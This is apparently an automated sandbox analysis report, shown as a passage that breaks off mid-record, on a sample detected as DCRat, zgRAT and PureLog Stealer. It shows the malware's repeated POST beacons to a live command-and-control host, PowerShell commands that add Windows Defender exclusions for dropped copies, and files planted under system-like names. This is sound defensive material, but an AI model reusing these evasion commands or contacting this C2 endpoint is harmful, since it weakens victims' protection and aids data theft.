                                                                                                            Nov 12, 2024 00:44:11.250150919 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:44:11.604767084 CET2512OUTData Raw: 51 52 5b 56 56 51 59 58 5c 58 5a 51 50 52 58 50 5b 56 5e 5b 55 5e 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[VVQYX\XZQPRXP[V^[U^Z]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y-2[?(>!,6358>0%"'[(&:Z 09?&[!"^.
                                                                                                            Nov 12, 2024 00:44:11.815165043 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:11.894896984 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:11 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            148192.168.2.45015537.44.238.25080
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:44:12.035393000 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:12.385730982 CET2512OUTData Raw: 54 50 5e 55 56 5f 59 59 5c 58 5a 51 50 5b 58 51 5b 56 5e 5a 55 5c 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP^UV_YY\XZQP[XQ[V^ZU\Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.Z))W5>'%58?>0>X#+"')=5&439[)5&[!"^.-
                                                                                                            Nov 12, 2024 00:44:12.605454922 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:12.687433004 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            149192.168.2.45015637.44.238.25080
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:44:12.836967945 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:44:13.182590961 CET2512OUTData Raw: 54 53 5e 56 56 5a 59 52 5c 58 5a 51 50 5b 58 56 5b 53 5e 5b 55 5e 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS^VVZYR\XZQP[XV[S^[U^ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:1=]%W6D'5$X 8;)65U'-]=5&4 -)%&[!"^.-
                                                                                                            Nov 12, 2024 00:44:13.436208963 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:44:13.509829044 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:44:13 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:18:41:59
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\s5duotgoYD.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                                                                                                            Imagebase:0x7ff678cc0000
                                                                                                            File size:2'759'232 bytes
                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:18:42:02
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP"
                                                                                                            Imagebase:0x7ff7a8e00000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:22
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:24
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:25
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:26
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:27
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:28
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:29
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:30
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:31
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:32
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:33
                                                                                                            Start time:18:42:03
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:34
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x630000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:35
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe"
                                                                                                            Imagebase:0x580000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:36
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat"
                                                                                                            Imagebase:0x7ff7cc2e0000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:37
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:38
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:39
                                                                                                            Start time:18:42:04
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\ModemLogs\conhost.exe
                                                                                                            Imagebase:0x9e0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:40
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\RuntimeBroker.exe
                                                                                                            Imagebase:0x70000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:41
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\RuntimeBroker.exe
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:42
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:chcp 65001
                                                                                                            Imagebase:0x7ff69e5b0000
                                                                                                            File size:14'848 bytes
                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:43
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Imagebase:0x6b0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:44
                                                                                                            Start time:18:42:05
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:45
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Imagebase:0x530000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\xKVBpkhCEjg.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:46
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                            Imagebase:0x7ff6810f0000
                                                                                                            File size:108'032 bytes
                                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:47
                                                                                                            Start time:18:42:06
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Recovery\xKVBpkhCEjg.exe
                                                                                                            Imagebase:0xa30000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:48
                                                                                                            Start time:18:42:12
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:49
                                                                                                            Start time:18:42:12
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:50
                                                                                                            Start time:18:42:13
                                                                                                            Start date:11/11/2024
                                                                                                            Path:C:\Recovery\RuntimeBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Recovery\RuntimeBroker.exe"
                                                                                                            Imagebase:0x250000
                                                                                                            File size:1'991'680 bytes
                                                                                                            MD5 hash:B379F4AC167609D8A3EF26444098B61D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:52
                                                                                                            Start time:18:42:17
